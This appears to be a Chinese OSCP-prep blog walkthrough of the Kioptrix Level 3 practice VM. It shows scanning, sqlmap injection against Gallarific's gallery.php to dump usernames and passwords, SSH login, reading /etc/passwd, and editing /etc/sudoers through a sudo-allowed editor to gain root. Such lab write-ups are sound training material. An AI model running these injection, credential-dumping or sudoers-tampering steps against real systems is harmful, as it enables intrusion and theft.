OSCP备战-kioptrixvm3详细解法

small_white_robot2025-05-12 14:32

探测IP

复制代码 
arp-scan -l

得出目标IP:192.168.155.165

也可以使用

复制代码 
netdiscover -i eth0 -r 192.168.155.0/24

也可以使用

复制代码 
nmap -sN 192.168.155.0/24 --min-rate 1000

修改hosts文件

找到IP后,通过之前读取README.txt了解到,我们需要编辑hosts文件,将其指向kioptrix3.com

输入命令:

复制代码 
sudo nano /etc/hosts

添加一行如图所示:

复制代码 
192.168.155.165 kioptrix3.com

按下ctrl+x保存退出

端口扫描

复制代码 
nmap -sV -sT --min-rate 1000 -p1-65535 IP

结果:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 08:49 EDT

Nmap scan report for 192.168.155.165

Host is up (0.0050s latency).

Not shown: 65533 closed tcp ports (conn-refused)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with

80端口

访问一下

拿dirsearch 扫一下看看

复制代码 
dirsearch -u http://192.168.155.165 -e *

访问一下试试:

192.168.155.165/phpmyadmin/index.php

尝试无密码登录:admin

进入后台

no privileges提示我们没有权限,显示即为一个虚拟数据库

尝试爆破了一下,没出结果

回到主页,能点的都点一下

博客给了一个网页http://kioptrix3.com/gallery,和主页点击now跳转网页是一样的

点击login又是一个登录框

最开始我们就改了hosts文件,访问一下http://kioptrix3.com站点

如图:

明显跟之前的页面不一样,在那dirsearch扫一下

复制代码 
dirsearch -u http://kioptrix3.com/gallery -e *

访问得到:

Gallarific 2.1 - Free Version released October 10, 2009

搜一下searchsploit Gallarific

有一个注入漏洞的

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch

数据库:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --dbs

现在连接的数据库:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-db

DBMS用户:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-user

发现是root用户

表:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery --tables

字段:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users --columns

值:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users -C "username,password" --dump

得到登录结果:
admin/n0t7t1k4

如此尝试,发现在dev_accounts中,得到了两组用户名和密码

尝试进行连接,只有后两组密码可以连接

复制代码 
ssh -oHostKeyAlgorithms=+ssh-rs- loneferret@192.168.155.165

查看查看:

复制代码 
cat /etc/passwd

列出当前用户家目录下的所有文件和文件夹:

复制代码 
ls -al

读取文件:

复制代码 
cat CompanyPolicy.README

查看权限:

复制代码 
sudo -l

根据提示执行:

复制代码 
sudo /usr/local/bin/ht

报错

执行命令:

复制代码 
echo $TERM
export TERM=xterm
echo $TERM

重新执行

复制代码 
sudo /usr/local/bin/ht


按住F3,输入/etc/sudoers

回车.当用户执行sudo命令时,系统会到/etc/sudoers文件中寻找相关信息来判断该用户是否具有执行sudo的权限,所以我们修改sudoers文件,试用户loneferret具有使用sudo执行/bin/bash的权限,以达到提权的目的。

修改配置添加一行

复制代码 
loneferret ALL=(ALL) ALL

F2保存,ctral+c退出

执行命令

复制代码 
sudo /bin/bash

成功

相关推荐
Dola_Zou28 分钟前
工业软件安全架构向模块化授权演进的解析
安全·自动化·安全架构·软件加密
互成1 小时前
加密系统哪款最好用?2026年五款加密系统深度对比测评
运维·网络·安全
mftang1 小时前
WebSocket 通信协议详细解析
网络·websocket·网络协议
野指针YZZ2 小时前
TCP包 wireshark抓包分析-RK3588
网络·tcp/ip·wireshark
纽创信安2 小时前
纽创信安与SGS启动网络安全ISO 21434认证项目
网络·安全·web安全
MinterFusion2 小时前
如何在开放麒麟(openKylin)下安装FTP服务器(v0.1.0)
运维·服务器·网络·vsftpd·开放麒麟·明德融创·openkylin
Predestination王瀞潞3 小时前
5.2.1 通信->DNS域名系统协议标准(IETF RFC 1035):DNS(Domain Name System)
网络·网络协议·tcp/ip
帐篷Li3 小时前
【AgenticCPS 】CPS联盟返利系统 - 实施计划
大数据·网络·人工智能
Fly Wine4 小时前
IPsec 最简单场景总部和网关之间建立,并且流量不会全部经过总部
网络
GOU925 小时前
5101实验
网络·macos
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)04OpenClaw 使用和管理 MCP 完全指南05Labelme从安装到标注:零基础完整指南06班级宠物园部署指南07UV安装并设置国内源08AI 编程三剑客:Spec-Kit、OpenSpec、Superpowers 深度对比与实战指南09OpenClaw Control UI安全上下文访问配置10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)